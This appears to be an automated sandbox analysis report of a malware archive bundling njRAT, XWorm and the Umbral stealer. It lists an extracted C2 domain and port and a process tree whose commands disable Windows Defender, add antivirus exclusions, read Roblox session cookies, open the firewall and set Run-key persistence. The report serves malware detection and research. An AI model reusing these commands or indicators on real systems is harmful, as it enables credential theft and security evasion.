njrat | e480c8945eb3750a57c2544a72059177b7b8cebdb0814c9e0155165daf83c53f

Analysis

max time kernel
125s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
13-12-2024 15:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

aquatic.rar
Size

32.9MB
MD5

5bd8314885aa5941e4e7d3fd1cd08c9e
SHA1

a8ee58da352c44dfe6d6659c6e3c1d0899638c26
SHA256

e480c8945eb3750a57c2544a72059177b7b8cebdb0814c9e0155165daf83c53f
SHA512

99f559d1866ebead5337de3098dc295ef8032bc59db8eb2d1f9853f559f574215743ace7fe386908818f190800403bdc41c981dfd9b3279851ff3c835256293e
SSDEEP

786432:c/lq+fejuFKsmOgrsiZbH0DlOy6m4cy5dJulOg1ns+RoDlQl/y:c/E/jYZfjidEE6ybJ61nR6Qlq

Score

10^/10

njrat umbral xworm discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

testarosa.duckdns.org:7110

Mutex

5ZpeoOe6AtQfr6wU

Attributes

Install_directory
%AppData%
install_file
Ondrive.exe

aes.plain

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001e00000002aa97-128.dat	family_umbral
behavioral1/memory/1224-142-0x000001442B110000-0x000001442B150000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002ab01-165.dat	family_xworm
behavioral1/memory/1484-171-0x00000000008F0000-0x0000000000900000-memory.dmp	family_xworm

Njrat family
njrat
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Command and Scripting Interpreter: PowerShell 1 TTPs 44 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2588	powershell.exe
2544	powershell.exe
3736	powershell.exe
3684	powershell.exe
2880	powershell.exe
2504	powershell.exe
2244	powershell.exe
1652	powershell.exe
2940	powershell.exe
3992	powershell.exe
2400	powershell.exe
1496	powershell.exe
652	powershell.exe
1032	powershell.exe
2892	powershell.exe
860	powershell.exe
3548	powershell.exe
2288	powershell.exe
2068	powershell.exe
1688	powershell.exe
4124	powershell.exe
1496	powershell.exe
4548	powershell.exe
1052	powershell.exe
2284	powershell.exe
656	powershell.exe
900	powershell.exe
3804	powershell.exe
2592	powershell.exe
5032	powershell.exe
1440	powershell.exe
2800	powershell.exe
3812	powershell.exe
3592	powershell.exe
752	powershell.exe
3216	powershell.exe
1332	powershell.exe
1916	powershell.exe
3820	powershell.exe
4616	powershell.exe
3512	powershell.exe
1368	powershell.exe
1120	powershell.exe
644	powershell.exe

Drops file in Drivers directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Aquatic.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3528	netsh.exe

Executes dropped EXE 64 IoCs

pid	Process
988	main.exe
3520	main.exe
1208	loader.exe
1224	Aquatic.exe
2344	Server.exe
948	loader.exe
4316	Server.exe
1484	conhost.exe
3608	Aquatic.exe
3192	Server.exe
2776	loader.exe
2928	Server.exe
480	conhost.exe
5076	Aquatic.exe
4716	Server.exe
3152	loader.exe
4124	Server.exe
4212	conhost.exe
1116	server.exe
2956	Aquatic.exe
536	Server.exe
1404	loader.exe
3552	Aquatic.exe
1112	Server.exe
1688	loader.exe
2692	Aquatic.exe
4340	Server.exe
2464	loader.exe
560	Aquatic.exe
4316	Server.exe
4268	loader.exe
232	Aquatic.exe
2272	Server.exe
1652	loader.exe
1732	Aquatic.exe
3468	Server.exe
3132	loader.exe
3100	Aquatic.exe
5088	Server.exe
5068	loader.exe
3220	Aquatic.exe
2412	Server.exe
1916	loader.exe
1772	Aquatic.exe
1428	Server.exe
2004	loader.exe
4136	Aquatic.exe
1596	Server.exe
3144	loader.exe
2944	Aquatic.exe
3668	Server.exe
956	loader.exe
1436	Aquatic.exe
3820	Server.exe
1004	loader.exe
792	Aquatic.exe
1548	Server.exe
2476	loader.exe
2336	Aquatic.exe
2940	Server.exe
4508	loader.exe
4016	Aquatic.exe
3736	Server.exe
1004	loader.exe

Loads dropped DLL 32 IoCs

pid	Process
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe
3520	main.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .."	server.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 14 IoCs

Web Service

T1102

flow	ioc
1	discord.com
51	discord.com
60	discord.com
47	discord.com
64	discord.com
7	discord.com
23	discord.com
35	discord.com
22	discord.com
42	discord.com
55	discord.com
3	discord.com
13	discord.com
21	discord.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
23	ip-api.com
3	ip-api.com
21	ip-api.com
22	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 25 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 18 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3524	cmd.exe
4124	PING.EXE
3768	PING.EXE
2012	cmd.exe
5108	PING.EXE
3728	PING.EXE
2244	cmd.exe
4548	PING.EXE
2644	cmd.exe
1888	PING.EXE
1424	cmd.exe
556	PING.EXE
3660	PING.EXE
3728	cmd.exe
3132	PING.EXE
4628	cmd.exe
2864	cmd.exe
3144	cmd.exe

Detects videocard installed 1 TTPs 10 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5100	wmic.exe
988	wmic.exe
4164	wmic.exe
3740	wmic.exe
4240	wmic.exe
2292	wmic.exe
2476	wmic.exe
2628	wmic.exe
5088	wmic.exe
988	wmic.exe

Modifies registry class 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe

Runs ping.exe 1 TTPs 9 IoCs

Remote System Discovery

T1018

pid	Process
1888	PING.EXE
3728	PING.EXE
3660	PING.EXE
4548	PING.EXE
3768	PING.EXE
5108	PING.EXE
4124	PING.EXE
556	PING.EXE
3132	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4188	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1484	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1224	Aquatic.exe
752	powershell.exe
752	powershell.exe
2544	powershell.exe
2544	powershell.exe
652	powershell.exe
652	powershell.exe
1828	powershell.exe
1828	powershell.exe
3216	powershell.exe
3216	powershell.exe
1332	powershell.exe
1332	powershell.exe
1368	powershell.exe
1368	powershell.exe
4548	powershell.exe
4548	powershell.exe
1120	powershell.exe
1120	powershell.exe
2692	Aquatic.exe
1916	powershell.exe
1916	powershell.exe
3548	powershell.exe
3548	powershell.exe
1052	powershell.exe
1052	powershell.exe
2888	powershell.exe
2888	powershell.exe
2284	powershell.exe
2284	powershell.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
3100	Aquatic.exe
2800	powershell.exe
1116	server.exe
1116	server.exe
1116	server.exe
2800	powershell.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
1116	server.exe
3736	powershell.exe
3736	powershell.exe
2288	powershell.exe
2288	powershell.exe
3804	powershell.exe
3804	powershell.exe
1116	server.exe
1116	server.exe
1116	server.exe
2504	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1736	7zFM.exe
1100	OpenWith.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	1736	7zFM.exe
Token: 35	1736	7zFM.exe
Token: SeSecurityPrivilege	1736	7zFM.exe
Token: SeDebugPrivilege	1224	Aquatic.exe
Token: SeDebugPrivilege	1484	conhost.exe
Token: SeIncreaseQuotaPrivilege	1052	wmic.exe
Token: SeSecurityPrivilege	1052	wmic.exe
Token: SeTakeOwnershipPrivilege	1052	wmic.exe
Token: SeLoadDriverPrivilege	1052	wmic.exe
Token: SeSystemProfilePrivilege	1052	wmic.exe
Token: SeSystemtimePrivilege	1052	wmic.exe
Token: SeProfSingleProcessPrivilege	1052	wmic.exe
Token: SeIncBasePriorityPrivilege	1052	wmic.exe
Token: SeCreatePagefilePrivilege	1052	wmic.exe
Token: SeBackupPrivilege	1052	wmic.exe
Token: SeRestorePrivilege	1052	wmic.exe
Token: SeShutdownPrivilege	1052	wmic.exe
Token: SeDebugPrivilege	1052	wmic.exe
Token: SeSystemEnvironmentPrivilege	1052	wmic.exe
Token: SeRemoteShutdownPrivilege	1052	wmic.exe
Token: SeUndockPrivilege	1052	wmic.exe
Token: SeManageVolumePrivilege	1052	wmic.exe
Token: 33	1052	wmic.exe
Token: 34	1052	wmic.exe
Token: 35	1052	wmic.exe
Token: 36	1052	wmic.exe
Token: SeIncreaseQuotaPrivilege	1052	wmic.exe
Token: SeSecurityPrivilege	1052	wmic.exe
Token: SeTakeOwnershipPrivilege	1052	wmic.exe
Token: SeLoadDriverPrivilege	1052	wmic.exe
Token: SeSystemProfilePrivilege	1052	wmic.exe
Token: SeSystemtimePrivilege	1052	wmic.exe
Token: SeProfSingleProcessPrivilege	1052	wmic.exe
Token: SeIncBasePriorityPrivilege	1052	wmic.exe
Token: SeCreatePagefilePrivilege	1052	wmic.exe
Token: SeBackupPrivilege	1052	wmic.exe
Token: SeRestorePrivilege	1052	wmic.exe
Token: SeShutdownPrivilege	1052	wmic.exe
Token: SeDebugPrivilege	1052	wmic.exe
Token: SeSystemEnvironmentPrivilege	1052	wmic.exe
Token: SeRemoteShutdownPrivilege	1052	wmic.exe
Token: SeUndockPrivilege	1052	wmic.exe
Token: SeManageVolumePrivilege	1052	wmic.exe
Token: 33	1052	wmic.exe
Token: 34	1052	wmic.exe
Token: 35	1052	wmic.exe
Token: 36	1052	wmic.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	2544	powershell.exe
Token: SeDebugPrivilege	480	conhost.exe
Token: SeDebugPrivilege	652	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeIncreaseQuotaPrivilege	2800	wmic.exe
Token: SeSecurityPrivilege	2800	wmic.exe
Token: SeTakeOwnershipPrivilege	2800	wmic.exe
Token: SeLoadDriverPrivilege	2800	wmic.exe
Token: SeSystemProfilePrivilege	2800	wmic.exe
Token: SeSystemtimePrivilege	2800	wmic.exe
Token: SeProfSingleProcessPrivilege	2800	wmic.exe
Token: SeIncBasePriorityPrivilege	2800	wmic.exe
Token: SeCreatePagefilePrivilege	2800	wmic.exe
Token: SeBackupPrivilege	2800	wmic.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1736	7zFM.exe
1736	7zFM.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe
1100	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 988 wrote to memory of 3520	988	main.exe	83
PID 988 wrote to memory of 3520	988	main.exe	83
PID 3520 wrote to memory of 4104	3520	main.exe	84
PID 3520 wrote to memory of 4104	3520	main.exe	84
PID 3520 wrote to memory of 1496	3520	main.exe	85
PID 3520 wrote to memory of 1496	3520	main.exe	85
PID 3520 wrote to memory of 4616	3520	main.exe	86
PID 3520 wrote to memory of 4616	3520	main.exe	86
PID 3520 wrote to memory of 112	3520	main.exe	87
PID 3520 wrote to memory of 112	3520	main.exe	87
PID 1208 wrote to memory of 1224	1208	loader.exe	90
PID 1208 wrote to memory of 1224	1208	loader.exe	90
PID 1208 wrote to memory of 2344	1208	loader.exe	91
PID 1208 wrote to memory of 2344	1208	loader.exe	91
PID 1208 wrote to memory of 948	1208	loader.exe	92
PID 1208 wrote to memory of 948	1208	loader.exe	92
PID 2344 wrote to memory of 4316	2344	Server.exe	93
PID 2344 wrote to memory of 4316	2344	Server.exe	93
PID 2344 wrote to memory of 4316	2344	Server.exe	93
PID 2344 wrote to memory of 1484	2344	Server.exe	94
PID 2344 wrote to memory of 1484	2344	Server.exe	94
PID 1224 wrote to memory of 1052	1224	Aquatic.exe	95
PID 1224 wrote to memory of 1052	1224	Aquatic.exe	95
PID 1224 wrote to memory of 3516	1224	Aquatic.exe	98
PID 1224 wrote to memory of 3516	1224	Aquatic.exe	98
PID 1224 wrote to memory of 752	1224	Aquatic.exe	100
PID 1224 wrote to memory of 752	1224	Aquatic.exe	100
PID 1224 wrote to memory of 2544	1224	Aquatic.exe	102
PID 1224 wrote to memory of 2544	1224	Aquatic.exe	102
PID 948 wrote to memory of 3608	948	loader.exe	104
PID 948 wrote to memory of 3608	948	loader.exe	104
PID 948 wrote to memory of 3192	948	loader.exe	105
PID 948 wrote to memory of 3192	948	loader.exe	105
PID 948 wrote to memory of 2776	948	loader.exe	106
PID 948 wrote to memory of 2776	948	loader.exe	106
PID 3192 wrote to memory of 2928	3192	Server.exe	107
PID 3192 wrote to memory of 2928	3192	Server.exe	107
PID 3192 wrote to memory of 2928	3192	Server.exe	107
PID 3192 wrote to memory of 480	3192	Server.exe	108
PID 3192 wrote to memory of 480	3192	Server.exe	108
PID 1224 wrote to memory of 652	1224	Aquatic.exe	109
PID 1224 wrote to memory of 652	1224	Aquatic.exe	109
PID 1224 wrote to memory of 1828	1224	Aquatic.exe	111
PID 1224 wrote to memory of 1828	1224	Aquatic.exe	111
PID 1484 wrote to memory of 3216	1484	conhost.exe	113
PID 1484 wrote to memory of 3216	1484	conhost.exe	113
PID 1484 wrote to memory of 1332	1484	conhost.exe	115
PID 1484 wrote to memory of 1332	1484	conhost.exe	115
PID 1224 wrote to memory of 2800	1224	Aquatic.exe	117
PID 1224 wrote to memory of 2800	1224	Aquatic.exe	117
PID 1484 wrote to memory of 1368	1484	conhost.exe	119
PID 1484 wrote to memory of 1368	1484	conhost.exe	119
PID 1224 wrote to memory of 3148	1224	Aquatic.exe	121
PID 1224 wrote to memory of 3148	1224	Aquatic.exe	121
PID 1224 wrote to memory of 2552	1224	Aquatic.exe	123
PID 1224 wrote to memory of 2552	1224	Aquatic.exe	123
PID 1224 wrote to memory of 4548	1224	Aquatic.exe	125
PID 1224 wrote to memory of 4548	1224	Aquatic.exe	125
PID 2776 wrote to memory of 5076	2776	loader.exe	127
PID 2776 wrote to memory of 5076	2776	loader.exe	127
PID 2776 wrote to memory of 4716	2776	loader.exe	128
PID 2776 wrote to memory of 4716	2776	loader.exe	128
PID 2776 wrote to memory of 3152	2776	loader.exe	129
PID 2776 wrote to memory of 3152	2776	loader.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 10 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3516	attrib.exe
1296	attrib.exe
4904	attrib.exe
1956	attrib.exe
2744	attrib.exe
1760	attrib.exe
2832	attrib.exe
1280	attrib.exe
5108	attrib.exe
2300	attrib.exe

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\aquatic.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1736

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3004

C:\Users\Admin\Desktop\aquatic\main.exe
"C:\Users\Admin\Desktop\aquatic\main.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:988
- C:\Users\Admin\AppData\Local\Temp\onefile_988_133785773131454322\main.exe
  "C:\Users\Admin\Desktop\aquatic\main.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c
    3⤵
    PID:4104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c title Aquatic Raider I Tokens Loaded: 0 I Proxies Loaded: 0 I Version: V3 I Join: discord.gg/aquaticraider
    3⤵
    PID:4616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:112

C:\Users\Admin\Desktop\aquatic\loader.exe
"C:\Users\Admin\Desktop\aquatic\loader.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Users\Admin\AppData\Local\Temp\Aquatic.exe
  "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1224
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe"
    3⤵
    - Views/modifies file attributes
    PID:3516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Aquatic.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:652
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1828
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2800
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3148
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4548
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:5100
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Aquatic.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:3524
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:1888
- C:\Users\Admin\AppData\Local\Temp\Server.exe
  "C:\Users\Admin\AppData\Local\Temp\Server.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2344
- - C:\Users\Admin\AppData\Roaming\Server.exe
    "C:\Users\Admin\AppData\Roaming\Server.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4316
  - - C:\Users\Admin\AppData\Local\Temp\server.exe
      "C:\Users\Admin\AppData\Local\Temp\server.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1116
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:3528
- - C:\Users\Admin\AppData\Roaming\conhost.exe
    "C:\Users\Admin\AppData\Roaming\conhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3216
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1120
  - - C:\Windows\System32\schtasks.exe
